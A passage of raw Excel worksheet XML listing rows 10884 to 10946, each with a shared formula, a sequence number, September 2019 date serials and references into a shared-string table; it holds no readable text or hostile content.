        <v>20774</v>
      </c>
      <c r="F10884" t="s">
        <v>10526</v>
      </c>
      <c r="G10884" t="s">
        <v>20775</v>
      </c>
    </row>
    <row r="10885" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10885">
        <f t="shared" si="170"/>
        <v>10884</v>
      </c>
      <c r="B10885">
        <v>884</v>
      </c>
      <c r="C10885" t="s">
        <v>19637</v>
      </c>
      <c r="D10885" s="1">
        <v>43712</v>
      </c>
      <c r="E10885" t="s">
        <v>19750</v>
      </c>
      <c r="F10885" t="s">
        <v>9978</v>
      </c>
      <c r="G10885" t="s">
        <v>20776</v>
      </c>
    </row>
    <row r="10886" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10886">
        <f t="shared" si="170"/>
        <v>10885</v>
      </c>
      <c r="B10886">
        <v>885</v>
      </c>
      <c r="C10886" t="s">
        <v>19637</v>
      </c>
      <c r="D10886" s="1">
        <v>43734</v>
      </c>
      <c r="E10886" t="s">
        <v>20777</v>
      </c>
      <c r="F10886" t="s">
        <v>10526</v>
      </c>
      <c r="G10886" t="s">
        <v>20778</v>
      </c>
    </row>
    <row r="10887" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10887">
        <f t="shared" si="170"/>
        <v>10886</v>
      </c>
      <c r="B10887">
        <v>886</v>
      </c>
      <c r="C10887" t="s">
        <v>19637</v>
      </c>
      <c r="D10887" s="1">
        <v>43733</v>
      </c>
      <c r="E10887" t="s">
        <v>20779</v>
      </c>
      <c r="F10887" t="s">
        <v>10021</v>
      </c>
      <c r="G10887" t="s">
        <v>20780</v>
      </c>
    </row>
    <row r="10888" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10888">
        <f t="shared" si="170"/>
        <v>10887</v>
      </c>
      <c r="B10888">
        <v>887</v>
      </c>
      <c r="C10888" t="s">
        <v>19637</v>
      </c>
      <c r="D10888" s="1">
        <v>43732</v>
      </c>
      <c r="E10888" t="s">
        <v>19650</v>
      </c>
      <c r="F10888" t="s">
        <v>10021</v>
      </c>
      <c r="G10888" t="s">
        <v>20781</v>
      </c>
    </row>
    <row r="10889" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10889">
        <f t="shared" si="170"/>
        <v>10888</v>
      </c>
      <c r="B10889">
        <v>888</v>
      </c>
      <c r="C10889" t="s">
        <v>19637</v>
      </c>
      <c r="D10889" s="1">
        <v>43735</v>
      </c>
      <c r="E10889" t="s">
        <v>19820</v>
      </c>
      <c r="F10889" t="s">
        <v>9978</v>
      </c>
      <c r="G10889" t="s">
        <v>20782</v>
      </c>
    </row>
    <row r="10890" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10890">
        <f t="shared" si="170"/>
        <v>10889</v>
      </c>
      <c r="B10890">
        <v>889</v>
      </c>
      <c r="C10890" t="s">
        <v>19637</v>
      </c>
      <c r="D10890" s="1">
        <v>43736</v>
      </c>
      <c r="E10890" t="s">
        <v>19750</v>
      </c>
      <c r="F10890" t="s">
        <v>9978</v>
      </c>
      <c r="G10890" t="s">
        <v>20783</v>
      </c>
    </row>
    <row r="10891" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10891">
        <f t="shared" si="170"/>
        <v>10890</v>
      </c>
      <c r="B10891">
        <v>890</v>
      </c>
      <c r="C10891" t="s">
        <v>19637</v>
      </c>
      <c r="D10891" s="1">
        <v>43710</v>
      </c>
      <c r="E10891" t="s">
        <v>19687</v>
      </c>
      <c r="F10891" t="s">
        <v>10021</v>
      </c>
      <c r="G10891" t="s">
        <v>20784</v>
      </c>
    </row>
    <row r="10892" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10892">
        <f t="shared" si="170"/>
        <v>10891</v>
      </c>
      <c r="B10892">
        <v>891</v>
      </c>
      <c r="C10892" t="s">
        <v>19637</v>
      </c>
      <c r="D10892" s="1">
        <v>43718</v>
      </c>
      <c r="E10892" t="s">
        <v>19640</v>
      </c>
      <c r="F10892" t="s">
        <v>9975</v>
      </c>
      <c r="G10892" t="s">
        <v>20785</v>
      </c>
    </row>
    <row r="10893" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10893">
        <f t="shared" si="170"/>
        <v>10892</v>
      </c>
      <c r="B10893">
        <v>892</v>
      </c>
      <c r="C10893" t="s">
        <v>19637</v>
      </c>
      <c r="D10893" s="1">
        <v>43728</v>
      </c>
      <c r="E10893" t="s">
        <v>20786</v>
      </c>
      <c r="F10893" t="s">
        <v>10021</v>
      </c>
      <c r="G10893" t="s">
        <v>20787</v>
      </c>
    </row>
    <row r="10894" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10894">
        <f t="shared" si="170"/>
        <v>10893</v>
      </c>
      <c r="B10894">
        <v>893</v>
      </c>
      <c r="C10894" t="s">
        <v>19637</v>
      </c>
      <c r="D10894" s="1">
        <v>43709</v>
      </c>
      <c r="E10894" t="s">
        <v>19650</v>
      </c>
      <c r="F10894" t="s">
        <v>10021</v>
      </c>
      <c r="G10894" t="s">
        <v>20788</v>
      </c>
    </row>
    <row r="10895" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10895">
        <f t="shared" si="170"/>
        <v>10894</v>
      </c>
      <c r="B10895">
        <v>894</v>
      </c>
      <c r="C10895" t="s">
        <v>19637</v>
      </c>
      <c r="D10895" s="1">
        <v>43714</v>
      </c>
      <c r="E10895" t="s">
        <v>20789</v>
      </c>
      <c r="F10895" t="s">
        <v>10526</v>
      </c>
      <c r="G10895" t="s">
        <v>20790</v>
      </c>
    </row>
    <row r="10896" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10896">
        <f t="shared" si="170"/>
        <v>10895</v>
      </c>
      <c r="B10896">
        <v>895</v>
      </c>
      <c r="C10896" t="s">
        <v>19637</v>
      </c>
      <c r="D10896" s="1">
        <v>43734</v>
      </c>
      <c r="E10896" t="s">
        <v>19672</v>
      </c>
      <c r="F10896" t="s">
        <v>10021</v>
      </c>
      <c r="G10896" t="s">
        <v>20791</v>
      </c>
    </row>
    <row r="10897" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10897">
        <f t="shared" si="170"/>
        <v>10896</v>
      </c>
      <c r="B10897">
        <v>896</v>
      </c>
      <c r="C10897" t="s">
        <v>19637</v>
      </c>
      <c r="D10897" s="1">
        <v>43736</v>
      </c>
      <c r="E10897" t="s">
        <v>19640</v>
      </c>
      <c r="F10897" t="s">
        <v>9975</v>
      </c>
      <c r="G10897" t="s">
        <v>20792</v>
      </c>
    </row>
    <row r="10898" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10898">
        <f t="shared" si="170"/>
        <v>10897</v>
      </c>
      <c r="B10898">
        <v>897</v>
      </c>
      <c r="C10898" t="s">
        <v>19637</v>
      </c>
      <c r="D10898" s="1">
        <v>43736</v>
      </c>
      <c r="E10898" t="s">
        <v>19758</v>
      </c>
      <c r="F10898" t="s">
        <v>10526</v>
      </c>
      <c r="G10898" t="s">
        <v>20793</v>
      </c>
    </row>
    <row r="10899" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10899">
        <f t="shared" si="170"/>
        <v>10898</v>
      </c>
      <c r="B10899">
        <v>898</v>
      </c>
      <c r="C10899" t="s">
        <v>19637</v>
      </c>
      <c r="D10899" s="1">
        <v>43714</v>
      </c>
      <c r="E10899" t="s">
        <v>20794</v>
      </c>
      <c r="F10899" t="s">
        <v>10526</v>
      </c>
      <c r="G10899" t="s">
        <v>20795</v>
      </c>
    </row>
    <row r="10900" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10900">
        <f t="shared" si="170"/>
        <v>10899</v>
      </c>
      <c r="B10900">
        <v>899</v>
      </c>
      <c r="C10900" t="s">
        <v>19637</v>
      </c>
      <c r="D10900" s="1">
        <v>43717</v>
      </c>
      <c r="E10900" t="s">
        <v>19713</v>
      </c>
      <c r="F10900" t="s">
        <v>9978</v>
      </c>
      <c r="G10900" t="s">
        <v>20796</v>
      </c>
    </row>
    <row r="10901" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10901">
        <f t="shared" si="170"/>
        <v>10900</v>
      </c>
      <c r="B10901">
        <v>900</v>
      </c>
      <c r="C10901" t="s">
        <v>19637</v>
      </c>
      <c r="D10901" s="1">
        <v>43736</v>
      </c>
      <c r="F10901" t="s">
        <v>10526</v>
      </c>
      <c r="G10901" t="s">
        <v>20797</v>
      </c>
    </row>
    <row r="10902" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10902">
        <f t="shared" si="170"/>
        <v>10901</v>
      </c>
      <c r="B10902">
        <v>901</v>
      </c>
      <c r="C10902" t="s">
        <v>19637</v>
      </c>
      <c r="D10902" s="1">
        <v>43734</v>
      </c>
      <c r="E10902" t="s">
        <v>19640</v>
      </c>
      <c r="F10902" t="s">
        <v>10526</v>
      </c>
      <c r="G10902" t="s">
        <v>20798</v>
      </c>
    </row>
    <row r="10903" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10903">
        <f t="shared" si="170"/>
        <v>10902</v>
      </c>
      <c r="B10903">
        <v>902</v>
      </c>
      <c r="C10903" t="s">
        <v>19637</v>
      </c>
      <c r="D10903" s="1">
        <v>43710</v>
      </c>
      <c r="E10903" t="s">
        <v>19638</v>
      </c>
      <c r="F10903" t="s">
        <v>10021</v>
      </c>
      <c r="G10903" t="s">
        <v>20799</v>
      </c>
    </row>
    <row r="10904" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10904">
        <f t="shared" si="170"/>
        <v>10903</v>
      </c>
      <c r="B10904">
        <v>903</v>
      </c>
      <c r="C10904" t="s">
        <v>19637</v>
      </c>
      <c r="D10904" s="1">
        <v>43721</v>
      </c>
      <c r="E10904" t="s">
        <v>19640</v>
      </c>
      <c r="F10904" t="s">
        <v>9978</v>
      </c>
      <c r="G10904" t="s">
        <v>20800</v>
      </c>
    </row>
    <row r="10905" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10905">
        <f t="shared" si="170"/>
        <v>10904</v>
      </c>
      <c r="B10905">
        <v>904</v>
      </c>
      <c r="C10905" t="s">
        <v>19637</v>
      </c>
      <c r="D10905" s="1">
        <v>43712</v>
      </c>
      <c r="E10905" t="s">
        <v>20801</v>
      </c>
      <c r="F10905" t="s">
        <v>9978</v>
      </c>
      <c r="G10905" t="s">
        <v>20802</v>
      </c>
    </row>
    <row r="10906" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10906">
        <f t="shared" si="170"/>
        <v>10905</v>
      </c>
      <c r="B10906">
        <v>905</v>
      </c>
      <c r="C10906" t="s">
        <v>19637</v>
      </c>
      <c r="D10906" s="1">
        <v>43732</v>
      </c>
      <c r="F10906" t="s">
        <v>10526</v>
      </c>
      <c r="G10906" t="s">
        <v>20803</v>
      </c>
    </row>
    <row r="10907" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10907">
        <f t="shared" si="170"/>
        <v>10906</v>
      </c>
      <c r="B10907">
        <v>906</v>
      </c>
      <c r="C10907" t="s">
        <v>19637</v>
      </c>
      <c r="D10907" s="1">
        <v>43714</v>
      </c>
      <c r="E10907" t="s">
        <v>19879</v>
      </c>
      <c r="F10907" t="s">
        <v>10021</v>
      </c>
      <c r="G10907" t="s">
        <v>20804</v>
      </c>
    </row>
    <row r="10908" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10908">
        <f t="shared" si="170"/>
        <v>10907</v>
      </c>
      <c r="B10908">
        <v>907</v>
      </c>
      <c r="C10908" t="s">
        <v>19637</v>
      </c>
      <c r="D10908" s="1">
        <v>43719</v>
      </c>
      <c r="E10908" t="s">
        <v>20805</v>
      </c>
      <c r="F10908" t="s">
        <v>9978</v>
      </c>
      <c r="G10908" t="s">
        <v>20806</v>
      </c>
    </row>
    <row r="10909" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10909">
        <f t="shared" si="170"/>
        <v>10908</v>
      </c>
      <c r="B10909">
        <v>908</v>
      </c>
      <c r="C10909" t="s">
        <v>19637</v>
      </c>
      <c r="D10909" s="1">
        <v>43721</v>
      </c>
      <c r="E10909" t="s">
        <v>19640</v>
      </c>
      <c r="F10909" t="s">
        <v>9975</v>
      </c>
      <c r="G10909" t="s">
        <v>20807</v>
      </c>
    </row>
    <row r="10910" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10910">
        <f t="shared" si="170"/>
        <v>10909</v>
      </c>
      <c r="B10910">
        <v>909</v>
      </c>
      <c r="C10910" t="s">
        <v>19637</v>
      </c>
      <c r="D10910" s="1">
        <v>43738</v>
      </c>
      <c r="E10910" t="s">
        <v>19640</v>
      </c>
      <c r="F10910" t="s">
        <v>10021</v>
      </c>
      <c r="G10910" t="s">
        <v>20808</v>
      </c>
    </row>
    <row r="10911" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10911">
        <f t="shared" si="170"/>
        <v>10910</v>
      </c>
      <c r="B10911">
        <v>910</v>
      </c>
      <c r="C10911" t="s">
        <v>19637</v>
      </c>
      <c r="D10911" s="1">
        <v>43722</v>
      </c>
      <c r="E10911" t="s">
        <v>20185</v>
      </c>
      <c r="F10911" t="s">
        <v>9975</v>
      </c>
      <c r="G10911" t="s">
        <v>20809</v>
      </c>
    </row>
    <row r="10912" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10912">
        <f t="shared" si="170"/>
        <v>10911</v>
      </c>
      <c r="B10912">
        <v>911</v>
      </c>
      <c r="C10912" t="s">
        <v>19637</v>
      </c>
      <c r="D10912" s="1">
        <v>43716</v>
      </c>
      <c r="E10912" t="s">
        <v>19650</v>
      </c>
      <c r="F10912" t="s">
        <v>10021</v>
      </c>
      <c r="G10912" t="s">
        <v>20810</v>
      </c>
    </row>
    <row r="10913" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10913">
        <f t="shared" si="170"/>
        <v>10912</v>
      </c>
      <c r="B10913">
        <v>912</v>
      </c>
      <c r="C10913" t="s">
        <v>19637</v>
      </c>
      <c r="D10913" s="1">
        <v>43727</v>
      </c>
      <c r="E10913" t="s">
        <v>20811</v>
      </c>
      <c r="F10913" t="s">
        <v>10021</v>
      </c>
      <c r="G10913" t="s">
        <v>20812</v>
      </c>
    </row>
    <row r="10914" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10914">
        <f t="shared" si="170"/>
        <v>10913</v>
      </c>
      <c r="B10914">
        <v>913</v>
      </c>
      <c r="C10914" t="s">
        <v>19637</v>
      </c>
      <c r="D10914" s="1">
        <v>43730</v>
      </c>
      <c r="E10914" t="s">
        <v>20813</v>
      </c>
      <c r="F10914" t="s">
        <v>10526</v>
      </c>
      <c r="G10914" t="s">
        <v>20814</v>
      </c>
    </row>
    <row r="10915" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10915">
        <f t="shared" si="170"/>
        <v>10914</v>
      </c>
      <c r="B10915">
        <v>914</v>
      </c>
      <c r="C10915" t="s">
        <v>19637</v>
      </c>
      <c r="D10915" s="1">
        <v>43713</v>
      </c>
      <c r="E10915" t="s">
        <v>20815</v>
      </c>
      <c r="F10915" t="s">
        <v>10526</v>
      </c>
      <c r="G10915" t="s">
        <v>20816</v>
      </c>
    </row>
    <row r="10916" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10916">
        <f t="shared" si="170"/>
        <v>10915</v>
      </c>
      <c r="B10916">
        <v>915</v>
      </c>
      <c r="C10916" t="s">
        <v>19637</v>
      </c>
      <c r="D10916" s="1">
        <v>43734</v>
      </c>
      <c r="E10916" t="s">
        <v>19672</v>
      </c>
      <c r="F10916" t="s">
        <v>10021</v>
      </c>
      <c r="G10916" t="s">
        <v>20817</v>
      </c>
    </row>
    <row r="10917" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10917">
        <f t="shared" si="170"/>
        <v>10916</v>
      </c>
      <c r="B10917">
        <v>916</v>
      </c>
      <c r="C10917" t="s">
        <v>19637</v>
      </c>
      <c r="D10917" s="1">
        <v>43713</v>
      </c>
      <c r="E10917" t="s">
        <v>19640</v>
      </c>
      <c r="F10917" t="s">
        <v>9975</v>
      </c>
      <c r="G10917" t="s">
        <v>20818</v>
      </c>
    </row>
    <row r="10918" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10918">
        <f t="shared" si="170"/>
        <v>10917</v>
      </c>
      <c r="B10918">
        <v>917</v>
      </c>
      <c r="C10918" t="s">
        <v>19637</v>
      </c>
      <c r="D10918" s="1">
        <v>43719</v>
      </c>
      <c r="E10918" t="s">
        <v>19640</v>
      </c>
      <c r="F10918" t="s">
        <v>9978</v>
      </c>
      <c r="G10918" t="s">
        <v>20819</v>
      </c>
    </row>
    <row r="10919" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10919">
        <f t="shared" si="170"/>
        <v>10918</v>
      </c>
      <c r="B10919">
        <v>918</v>
      </c>
      <c r="C10919" t="s">
        <v>19637</v>
      </c>
      <c r="D10919" s="1">
        <v>43735</v>
      </c>
      <c r="E10919" t="s">
        <v>20820</v>
      </c>
      <c r="F10919" t="s">
        <v>10021</v>
      </c>
      <c r="G10919" t="s">
        <v>20821</v>
      </c>
    </row>
    <row r="10920" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10920">
        <f t="shared" si="170"/>
        <v>10919</v>
      </c>
      <c r="B10920">
        <v>919</v>
      </c>
      <c r="C10920" t="s">
        <v>19637</v>
      </c>
      <c r="D10920" s="1">
        <v>43732</v>
      </c>
      <c r="E10920" t="s">
        <v>19640</v>
      </c>
      <c r="F10920" t="s">
        <v>10526</v>
      </c>
      <c r="G10920" t="s">
        <v>20822</v>
      </c>
    </row>
    <row r="10921" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10921">
        <f t="shared" si="170"/>
        <v>10920</v>
      </c>
      <c r="B10921">
        <v>920</v>
      </c>
      <c r="C10921" t="s">
        <v>19637</v>
      </c>
      <c r="D10921" s="1">
        <v>43709</v>
      </c>
      <c r="E10921" t="s">
        <v>19668</v>
      </c>
      <c r="F10921" t="s">
        <v>9978</v>
      </c>
      <c r="G10921" t="s">
        <v>20823</v>
      </c>
    </row>
    <row r="10922" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10922">
        <f t="shared" si="170"/>
        <v>10921</v>
      </c>
      <c r="B10922">
        <v>921</v>
      </c>
      <c r="C10922" t="s">
        <v>19637</v>
      </c>
      <c r="D10922" s="1">
        <v>43720</v>
      </c>
      <c r="E10922" t="s">
        <v>19849</v>
      </c>
      <c r="F10922" t="s">
        <v>10021</v>
      </c>
      <c r="G10922" t="s">
        <v>20824</v>
      </c>
    </row>
    <row r="10923" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10923">
        <f t="shared" si="170"/>
        <v>10922</v>
      </c>
      <c r="B10923">
        <v>922</v>
      </c>
      <c r="C10923" t="s">
        <v>19637</v>
      </c>
      <c r="D10923" s="1">
        <v>43722</v>
      </c>
      <c r="E10923" t="s">
        <v>19849</v>
      </c>
      <c r="F10923" t="s">
        <v>10021</v>
      </c>
      <c r="G10923" t="s">
        <v>20825</v>
      </c>
    </row>
    <row r="10924" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10924">
        <f t="shared" si="170"/>
        <v>10923</v>
      </c>
      <c r="B10924">
        <v>923</v>
      </c>
      <c r="C10924" t="s">
        <v>19637</v>
      </c>
      <c r="D10924" s="1">
        <v>43728</v>
      </c>
      <c r="E10924" t="s">
        <v>20288</v>
      </c>
      <c r="F10924" t="s">
        <v>10021</v>
      </c>
      <c r="G10924" t="s">
        <v>20826</v>
      </c>
    </row>
    <row r="10925" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10925">
        <f t="shared" si="170"/>
        <v>10924</v>
      </c>
      <c r="B10925">
        <v>924</v>
      </c>
      <c r="C10925" t="s">
        <v>19637</v>
      </c>
      <c r="D10925" s="1">
        <v>43738</v>
      </c>
      <c r="E10925" t="s">
        <v>20827</v>
      </c>
      <c r="F10925" t="s">
        <v>10526</v>
      </c>
      <c r="G10925" t="s">
        <v>20828</v>
      </c>
    </row>
    <row r="10926" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10926">
        <f t="shared" si="170"/>
        <v>10925</v>
      </c>
      <c r="B10926">
        <v>925</v>
      </c>
      <c r="C10926" t="s">
        <v>19637</v>
      </c>
      <c r="D10926" s="1">
        <v>43709</v>
      </c>
      <c r="E10926" t="s">
        <v>20829</v>
      </c>
      <c r="F10926" t="s">
        <v>10021</v>
      </c>
      <c r="G10926" t="s">
        <v>20830</v>
      </c>
    </row>
    <row r="10927" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10927">
        <f t="shared" si="170"/>
        <v>10926</v>
      </c>
      <c r="B10927">
        <v>926</v>
      </c>
      <c r="C10927" t="s">
        <v>19637</v>
      </c>
      <c r="D10927" s="1">
        <v>43713</v>
      </c>
      <c r="E10927" t="s">
        <v>20831</v>
      </c>
      <c r="F10927" t="s">
        <v>9978</v>
      </c>
      <c r="G10927" t="s">
        <v>20832</v>
      </c>
    </row>
    <row r="10928" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10928">
        <f t="shared" si="170"/>
        <v>10927</v>
      </c>
      <c r="B10928">
        <v>927</v>
      </c>
      <c r="C10928" t="s">
        <v>19637</v>
      </c>
      <c r="D10928" s="1">
        <v>43718</v>
      </c>
      <c r="E10928" t="s">
        <v>19672</v>
      </c>
      <c r="F10928" t="s">
        <v>10021</v>
      </c>
      <c r="G10928" t="s">
        <v>20833</v>
      </c>
    </row>
    <row r="10929" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10929">
        <f t="shared" si="170"/>
        <v>10928</v>
      </c>
      <c r="B10929">
        <v>928</v>
      </c>
      <c r="C10929" t="s">
        <v>19637</v>
      </c>
      <c r="D10929" s="1">
        <v>43734</v>
      </c>
      <c r="E10929" t="s">
        <v>20834</v>
      </c>
      <c r="F10929" t="s">
        <v>9978</v>
      </c>
      <c r="G10929" t="s">
        <v>20835</v>
      </c>
    </row>
    <row r="10930" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10930">
        <f t="shared" si="170"/>
        <v>10929</v>
      </c>
      <c r="B10930">
        <v>929</v>
      </c>
      <c r="C10930" t="s">
        <v>19637</v>
      </c>
      <c r="D10930" s="1">
        <v>43722</v>
      </c>
      <c r="E10930" t="s">
        <v>19640</v>
      </c>
      <c r="F10930" t="s">
        <v>9975</v>
      </c>
      <c r="G10930" t="s">
        <v>20836</v>
      </c>
    </row>
    <row r="10931" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10931">
        <f t="shared" si="170"/>
        <v>10930</v>
      </c>
      <c r="B10931">
        <v>930</v>
      </c>
      <c r="C10931" t="s">
        <v>19637</v>
      </c>
      <c r="D10931" s="1">
        <v>43715</v>
      </c>
      <c r="E10931" t="s">
        <v>20837</v>
      </c>
      <c r="F10931" t="s">
        <v>9978</v>
      </c>
      <c r="G10931" t="s">
        <v>20838</v>
      </c>
    </row>
    <row r="10932" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10932">
        <f t="shared" si="170"/>
        <v>10931</v>
      </c>
      <c r="B10932">
        <v>931</v>
      </c>
      <c r="C10932" t="s">
        <v>19637</v>
      </c>
      <c r="D10932" s="1">
        <v>43723</v>
      </c>
      <c r="E10932" t="s">
        <v>19640</v>
      </c>
      <c r="F10932" t="s">
        <v>10021</v>
      </c>
      <c r="G10932" t="s">
        <v>20839</v>
      </c>
    </row>
    <row r="10933" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10933">
        <f t="shared" si="170"/>
        <v>10932</v>
      </c>
      <c r="B10933">
        <v>932</v>
      </c>
      <c r="C10933" t="s">
        <v>19637</v>
      </c>
      <c r="D10933" s="1">
        <v>43734</v>
      </c>
      <c r="E10933" t="s">
        <v>19672</v>
      </c>
      <c r="F10933" t="s">
        <v>10021</v>
      </c>
      <c r="G10933" t="s">
        <v>20840</v>
      </c>
    </row>
    <row r="10934" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10934">
        <f t="shared" si="170"/>
        <v>10933</v>
      </c>
      <c r="B10934">
        <v>933</v>
      </c>
      <c r="C10934" t="s">
        <v>19637</v>
      </c>
      <c r="D10934" s="1">
        <v>43734</v>
      </c>
      <c r="E10934" t="s">
        <v>19982</v>
      </c>
      <c r="F10934" t="s">
        <v>9978</v>
      </c>
      <c r="G10934" t="s">
        <v>20841</v>
      </c>
    </row>
    <row r="10935" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10935">
        <f t="shared" si="170"/>
        <v>10934</v>
      </c>
      <c r="B10935">
        <v>934</v>
      </c>
      <c r="C10935" t="s">
        <v>19637</v>
      </c>
      <c r="D10935" s="1">
        <v>43734</v>
      </c>
      <c r="E10935" t="s">
        <v>20842</v>
      </c>
      <c r="F10935" t="s">
        <v>9978</v>
      </c>
      <c r="G10935" t="s">
        <v>20843</v>
      </c>
    </row>
    <row r="10936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10936">
        <f t="shared" si="170"/>
        <v>10935</v>
      </c>
      <c r="B10936">
        <v>935</v>
      </c>
      <c r="C10936" t="s">
        <v>19637</v>
      </c>
      <c r="D10936" s="1">
        <v>43718</v>
      </c>
      <c r="E10936" t="s">
        <v>20844</v>
      </c>
      <c r="F10936" t="s">
        <v>9978</v>
      </c>
      <c r="G10936" t="s">
        <v>20845</v>
      </c>
    </row>
    <row r="10937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10937">
        <f t="shared" si="170"/>
        <v>10936</v>
      </c>
      <c r="B10937">
        <v>936</v>
      </c>
      <c r="C10937" t="s">
        <v>19637</v>
      </c>
      <c r="D10937" s="1">
        <v>43720</v>
      </c>
      <c r="E10937" t="s">
        <v>19640</v>
      </c>
      <c r="F10937" t="s">
        <v>9975</v>
      </c>
      <c r="G10937" t="s">
        <v>20846</v>
      </c>
    </row>
    <row r="10938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10938">
        <f t="shared" si="170"/>
        <v>10937</v>
      </c>
      <c r="B10938">
        <v>937</v>
      </c>
      <c r="C10938" t="s">
        <v>19637</v>
      </c>
      <c r="D10938" s="1">
        <v>43738</v>
      </c>
      <c r="E10938" t="s">
        <v>20253</v>
      </c>
      <c r="F10938" t="s">
        <v>9978</v>
      </c>
      <c r="G10938" t="s">
        <v>20847</v>
      </c>
    </row>
    <row r="10939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10939">
        <f t="shared" si="170"/>
        <v>10938</v>
      </c>
      <c r="B10939">
        <v>938</v>
      </c>
      <c r="C10939" t="s">
        <v>19637</v>
      </c>
      <c r="D10939" s="1">
        <v>43719</v>
      </c>
      <c r="E10939" t="s">
        <v>19653</v>
      </c>
      <c r="F10939" t="s">
        <v>9975</v>
      </c>
      <c r="G10939" t="s">
        <v>20848</v>
      </c>
    </row>
    <row r="10940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10940">
        <f t="shared" si="170"/>
        <v>10939</v>
      </c>
      <c r="B10940">
        <v>939</v>
      </c>
      <c r="C10940" t="s">
        <v>19637</v>
      </c>
      <c r="D10940" s="1">
        <v>43716</v>
      </c>
      <c r="F10940" t="s">
        <v>10526</v>
      </c>
      <c r="G10940" t="s">
        <v>20849</v>
      </c>
    </row>
    <row r="10941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10941">
        <f t="shared" si="170"/>
        <v>10940</v>
      </c>
      <c r="B10941">
        <v>940</v>
      </c>
      <c r="C10941" t="s">
        <v>19637</v>
      </c>
      <c r="D10941" s="1">
        <v>43732</v>
      </c>
      <c r="E10941" t="s">
        <v>19640</v>
      </c>
      <c r="F10941" t="s">
        <v>9975</v>
      </c>
      <c r="G10941" t="s">
        <v>20850</v>
      </c>
    </row>
    <row r="10942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10942">
        <f t="shared" si="170"/>
        <v>10941</v>
      </c>
      <c r="B10942">
        <v>941</v>
      </c>
      <c r="C10942" t="s">
        <v>19637</v>
      </c>
      <c r="D10942" s="1">
        <v>43725</v>
      </c>
      <c r="E10942" t="s">
        <v>20250</v>
      </c>
      <c r="F10942" t="s">
        <v>10021</v>
      </c>
      <c r="G10942" t="s">
        <v>20851</v>
      </c>
    </row>
    <row r="10943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10943">
        <f t="shared" si="170"/>
        <v>10942</v>
      </c>
      <c r="B10943">
        <v>942</v>
      </c>
      <c r="C10943" t="s">
        <v>19637</v>
      </c>
      <c r="D10943" s="1">
        <v>43733</v>
      </c>
      <c r="E10943" t="s">
        <v>19640</v>
      </c>
      <c r="F10943" t="s">
        <v>9975</v>
      </c>
      <c r="G10943" t="s">
        <v>20852</v>
      </c>
    </row>
    <row r="10944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10944">
        <f t="shared" si="170"/>
        <v>10943</v>
      </c>
      <c r="B10944">
        <v>943</v>
      </c>
      <c r="C10944" t="s">
        <v>19637</v>
      </c>
      <c r="D10944" s="1">
        <v>43714</v>
      </c>
      <c r="E10944" t="s">
        <v>20853</v>
      </c>
      <c r="F10944" t="s">
        <v>10526</v>
      </c>
      <c r="G10944" t="s">
        <v>20854</v>
      </c>
    </row>
    <row r="10945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10945">
        <f t="shared" si="170"/>
        <v>10944</v>
      </c>
      <c r="B10945">
        <v>944</v>
      </c>
      <c r="C10945" t="s">
        <v>19637</v>
      </c>
      <c r="D10945" s="1">
        <v>43723</v>
      </c>
      <c r="E10945" t="s">
        <v>20855</v>
      </c>
      <c r="F10945" t="s">
        <v>10526</v>
      </c>
      <c r="G10945" t="s">
        <v>20856</v>
      </c>
    </row>
    <row r="10946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10946">
        <f t="shared" si="170"/>
